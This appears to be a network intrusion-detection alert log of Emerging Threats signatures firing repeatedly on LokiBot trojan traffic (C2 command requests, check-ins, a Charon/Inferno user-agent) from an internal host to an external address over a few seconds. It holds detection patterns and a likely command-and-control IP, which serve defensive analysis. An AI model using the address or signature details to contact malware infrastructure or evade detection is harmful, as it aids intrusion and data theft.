11/25/21-10:53:22.409035	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50462	80	192.168.11.20	176.223.209.128
11/25/21-10:53:22.929210	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50463	80	192.168.11.20	176.223.209.128
11/25/21-10:53:22.929210	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50463	80	192.168.11.20	176.223.209.128
11/25/21-10:53:22.929210	TCP	2025381	ET TROJAN LokiBot Checkin	50463	80	192.168.11.20	176.223.209.128
11/25/21-10:53:22.929210	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50463	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.429112	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50464	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.429112	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50464	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.429112	TCP	2025381	ET TROJAN LokiBot Checkin	50464	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.429112	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50464	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.867977	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50465	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.867977	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50465	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.867977	TCP	2025381	ET TROJAN LokiBot Checkin	50465	80	192.168.11.20	176.223.209.128
11/25/21-10:53:23.867977	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50465	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.376610	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50466	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.376610	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50466	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.376610	TCP	2025381	ET TROJAN LokiBot Checkin	50466	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.376610	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50466	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.847520	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50467	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.847520	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50467	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.847520	TCP	2025381	ET TROJAN LokiBot Checkin	50467	80	192.168.11.20	176.223.209.128
11/25/21-10:53:24.847520	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50467	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.354969	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50468	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.354969	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50468	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.354969	TCP	2025381	ET TROJAN LokiBot Checkin	50468	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.354969	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50468	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.882854	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50469	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.882854	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50469	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.882854	TCP	2025381	ET TROJAN LokiBot Checkin	50469	80	192.168.11.20	176.223.209.128
11/25/21-10:53:25.882854	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50469	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.385596	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50470	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.385596	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50470	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.385596	TCP	2025381	ET TROJAN LokiBot Checkin	50470	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.385596	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50470	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.886544	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50471	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.886544	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50471	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.886544	TCP	2025381	ET TROJAN LokiBot Checkin	50471	80	192.168.11.20	176.223.209.128
11/25/21-10:53:26.886544	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50471	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.350877	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50472	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.350877	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50472	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.350877	TCP	2025381	ET TROJAN LokiBot Checkin	50472	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.350877	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50472	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.846663	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50473	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.846663	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50473	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.846663	TCP	2025381	ET TROJAN LokiBot Checkin	50473	80	192.168.11.20	176.223.209.128
11/25/21-10:53:27.846663	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50473	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.355336	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50474	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.355336	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50474	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.355336	TCP	2025381	ET TROJAN LokiBot Checkin	50474	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.355336	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50474	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.862322	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50475	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.862322	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50475	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.862322	TCP	2025381	ET TROJAN LokiBot Checkin	50475	80	192.168.11.20	176.223.209.128
11/25/21-10:53:28.862322	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50475	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.372843	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50476	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.372843	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50476	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.372843	TCP	2025381	ET TROJAN LokiBot Checkin	50476	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.372843	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50476	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.843203	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50477	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.843203	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50477	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.843203	TCP	2025381	ET TROJAN LokiBot Checkin	50477	80	192.168.11.20	176.223.209.128
11/25/21-10:53:29.843203	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50477	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.308855	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50478	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.308855	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50478	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.308855	TCP	2025381	ET TROJAN LokiBot Checkin	50478	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.308855	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50478	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.786736	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50479	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.786736	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50479	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.786736	TCP	2025381	ET TROJAN LokiBot Checkin	50479	80	192.168.11.20	176.223.209.128
11/25/21-10:53:30.786736	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50479	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.296934	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50480	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.296934	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50480	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.296934	TCP	2025381	ET TROJAN LokiBot Checkin	50480	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.296934	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50480	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.808200	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50481	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.808200	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50481	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.808200	TCP	2025381	ET TROJAN LokiBot Checkin	50481	80	192.168.11.20	176.223.209.128
11/25/21-10:53:31.808200	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50481	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.331859	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50482	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.331859	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50482	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.331859	TCP	2025381	ET TROJAN LokiBot Checkin	50482	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.331859	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50482	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.797645	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50483	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.797645	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50483	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.797645	TCP	2025381	ET TROJAN LokiBot Checkin	50483	80	192.168.11.20	176.223.209.128
11/25/21-10:53:32.797645	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50483	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.325394	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50484	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.325394	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50484	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.325394	TCP	2025381	ET TROJAN LokiBot Checkin	50484	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.325394	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50484	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.845490	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50485	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.845490	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50485	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.845490	TCP	2025381	ET TROJAN LokiBot Checkin	50485	80	192.168.11.20	176.223.209.128
11/25/21-10:53:33.845490	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50485	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.266818	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50486	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.266818	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50486	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.266818	TCP	2025381	ET TROJAN LokiBot Checkin	50486	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.266818	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50486	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.777722	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50487	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.777722	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50487	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.777722	TCP	2025381	ET TROJAN LokiBot Checkin	50487	80	192.168.11.20	176.223.209.128
11/25/21-10:53:34.777722	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50487	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.308824	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50488	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.308824	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50488	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.308824	TCP	2025381	ET TROJAN LokiBot Checkin	50488	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.308824	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50488	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.762265	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50489	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.762265	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50489	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.762265	TCP	2025381	ET TROJAN LokiBot Checkin	50489	80	192.168.11.20	176.223.209.128
11/25/21-10:53:35.762265	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50489	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.258620	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50490	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.258620	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50490	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.258620	TCP	2025381	ET TROJAN LokiBot Checkin	50490	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.258620	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50490	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.772211	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50491	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.772211	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50491	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.772211	TCP	2025381	ET TROJAN LokiBot Checkin	50491	80	192.168.11.20	176.223.209.128
11/25/21-10:53:36.772211	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50491	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.268575	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50492	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.268575	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50492	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.268575	TCP	2025381	ET TROJAN LokiBot Checkin	50492	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.268575	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50492	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.770352	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50493	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.770352	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50493	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.770352	TCP	2025381	ET TROJAN LokiBot Checkin	50493	80	192.168.11.20	176.223.209.128
11/25/21-10:53:37.770352	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50493	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.269614	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50494	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.269614	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50494	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.269614	TCP	2025381	ET TROJAN LokiBot Checkin	50494	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.269614	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50494	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.709614	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50495	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.709614	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50495	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.709614	TCP	2025381	ET TROJAN LokiBot Checkin	50495	80	192.168.11.20	176.223.209.128
11/25/21-10:53:38.709614	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50495	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.207845	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50496	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.207845	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50496	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.207845	TCP	2025381	ET TROJAN LokiBot Checkin	50496	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.207845	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50496	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.732608	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50497	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.732608	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50497	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.732608	TCP	2025381	ET TROJAN LokiBot Checkin	50497	80	192.168.11.20	176.223.209.128
11/25/21-10:53:39.732608	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50497	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.243964	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50498	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.243964	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50498	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.243964	TCP	2025381	ET TROJAN LokiBot Checkin	50498	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.243964	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50498	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.753145	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50499	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.753145	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50499	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.753145	TCP	2025381	ET TROJAN LokiBot Checkin	50499	80	192.168.11.20	176.223.209.128
11/25/21-10:53:40.753145	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50499	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.238328	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50500	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.238328	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50500	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.238328	TCP	2025381	ET TROJAN LokiBot Checkin	50500	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.238328	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50500	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.681848	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50501	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.681848	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50501	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.681848	TCP	2025381	ET TROJAN LokiBot Checkin	50501	80	192.168.11.20	176.223.209.128
11/25/21-10:53:41.681848	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50501	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.195313	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50502	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.195313	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50502	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.195313	TCP	2025381	ET TROJAN LokiBot Checkin	50502	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.195313	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50502	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.680123	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50503	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.680123	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50503	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.680123	TCP	2025381	ET TROJAN LokiBot Checkin	50503	80	192.168.11.20	176.223.209.128
11/25/21-10:53:42.680123	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50503	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.187163	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50504	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.187163	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50504	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.187163	TCP	2025381	ET TROJAN LokiBot Checkin	50504	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.187163	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50504	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.695678	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50505	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.695678	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50505	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.695678	TCP	2025381	ET TROJAN LokiBot Checkin	50505	80	192.168.11.20	176.223.209.128
11/25/21-10:53:43.695678	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50505	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.139015	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50506	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.139015	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50506	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.139015	TCP	2025381	ET TROJAN LokiBot Checkin	50506	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.139015	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50506	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.584132	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50507	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.584132	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50507	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.584132	TCP	2025381	ET TROJAN LokiBot Checkin	50507	80	192.168.11.20	176.223.209.128
11/25/21-10:53:44.584132	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50507	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.050531	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50508	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.050531	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50508	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.050531	TCP	2025381	ET TROJAN LokiBot Checkin	50508	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.050531	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50508	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.484128	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50509	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.484128	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50509	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.484128	TCP	2025381	ET TROJAN LokiBot Checkin	50509	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.484128	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50509	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.998078	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50510	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.998078	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50510	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.998078	TCP	2025381	ET TROJAN LokiBot Checkin	50510	80	192.168.11.20	176.223.209.128
11/25/21-10:53:45.998078	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50510	80	192.168.11.20	176.223.209.128
11/25/21-10:53:46.507064	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50511	80	192.168.11.20	176.223.209.128
11/25/21-10:53:46.507064	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50511	80	192.168.11.20	176.223.209.128
11/25/21-10:53:46.507064	TCP	2025381	ET TROJAN LokiBot Checkin	50511	80	192.168.11.20	176.223.209.128
11/25/21-10:53:46.507064	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50511	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.023184	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50512	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.023184	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50512	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.023184	TCP	2025381	ET TROJAN LokiBot Checkin	50512	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.023184	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50512	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.499400	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50513	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.499400	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50513	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.499400	TCP	2025381	ET TROJAN LokiBot Checkin	50513	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.499400	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50513	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.998735	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50514	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.998735	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50514	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.998735	TCP	2025381	ET TROJAN LokiBot Checkin	50514	80	192.168.11.20	176.223.209.128
11/25/21-10:53:47.998735	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50514	80	192.168.11.20	176.223.209.128
11/25/21-10:53:48.491253	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50515	80	192.168.11.20	176.223.209.128
11/25/21-10:53:48.491253	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50515	80	192.168.11.20	176.223.209.128
11/25/21-10:53:48.491253	TCP	2025381	ET TROJAN LokiBot Checkin	50515	80	192.168.11.20	176.223.209.128
11/25/21-10:53:48.491253	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50515	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.005088	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50516	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.005088	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50516	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.005088	TCP	2025381	ET TROJAN LokiBot Checkin	50516	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.005088	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50516	80	192.168.11.20	176.223.209.128
11/25/21-10:53:49.515577	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50517	80	192.168.11.20	176.223.209.128
